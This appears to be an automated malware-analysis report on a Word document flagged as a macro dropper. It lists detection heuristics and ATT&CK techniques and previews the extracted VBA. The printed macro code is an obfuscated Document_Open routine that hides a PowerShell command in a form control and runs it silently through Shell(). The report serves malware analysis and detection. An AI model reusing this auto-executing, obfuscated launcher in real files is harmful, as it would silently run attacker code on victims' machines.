MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains VBA macros, including a Document_Open macro that triggers the execution of the Shell() function. This indicates an attempt to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6834984-0' further supports its malicious nature as a dropper. The embedded URL is benign and likely a false positive.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6834984-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6834984-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1969 bytes |
SHA-256: a546531e92e69d339e0009a0f4e2b575b8f6e600b5a0cb402c0aa956428bcb26 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim Au9kFm
Au9kFm = Ya1U6
Dim lDKiqQtw() As Byte
x
End Sub
Public Sub sh(tNIzs0K As String, IRTE5rz As Integer)
Dim wlg1b6ck As String
wlg1b6ck = H5PFvk
Dim qfVwed(13 To 175) As Long
qfVwed(13) = 106 + 13
Dim rnwmJTD(12 To 240) As Long
rnwmJTD(12) = 19200 / 96
Dim jaeYEb() As Byte
Dim N38BwD(5 To 136) As Long
N38BwD(5) = 57 + 87
Dim ll0L2q(9 To 222) As String
ll0L2q(9) = "lPegNUT5"
Dim w7yTB(9 To 222) As Long
w7yTB(9) = -607 + 639
End Sub
Attribute VB_Name = "kSfl0eQcY"
Sub x()
Dim Z80jrG
Z80jrG = lrIj8
Dim QOnoh(5 To 43) As Long
QOnoh(5) = -70 + 207
Dim rtsrG As String
rtsrG = bsmpcEKqX
Dim YQ1X48(15 To 143) As Long
YQ1X48(15) = 247 - 25
Call VBA.Shell("po" & _
YlGyHP, 0)
Dim apROA6xIW() As Byte
Dim ZhcKueFHj As Long
ZhcKueFHj = (-768 + 778) * (10)
End Sub
Attribute VB_Name = "AoMcI0"
Public Function HndPxI(fON7dqlgw As Integer)
Dim J2CvWpJ(46) As Byte
Dim MvTUY6e(1 To 52) As Long
MvTUY6e(1) = 84 + 103
Dim QoWKi(3 To 97) As Long
QoWKi(3) = 1505 - 1485
Dim tav0iU As Long
tav0iU = (17513 - 17512) * (42)
End Function
Attribute VB_Name = "CkA3x"
Public Function YlGyHP()
Dim VuTGsh As Object
Set VuTGsh = New f
Dim jhCYncK8(9 To 36) As String
jhCYncK8(9) = "Okj0aZ"
Dim yp3CIdx1f As String
yp3CIdx1f = VuTGsh.de.Text
YlGyHP = yp3CIdx1f
End Function
Attribute VB_Name = "f"
Attribute VB_Base = "0{727E47F7-24C9-4B4B-A99D-E1647AF4D90B}{7144EE7B-0C8B-472F-A5C2-C0E07CE59BEE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.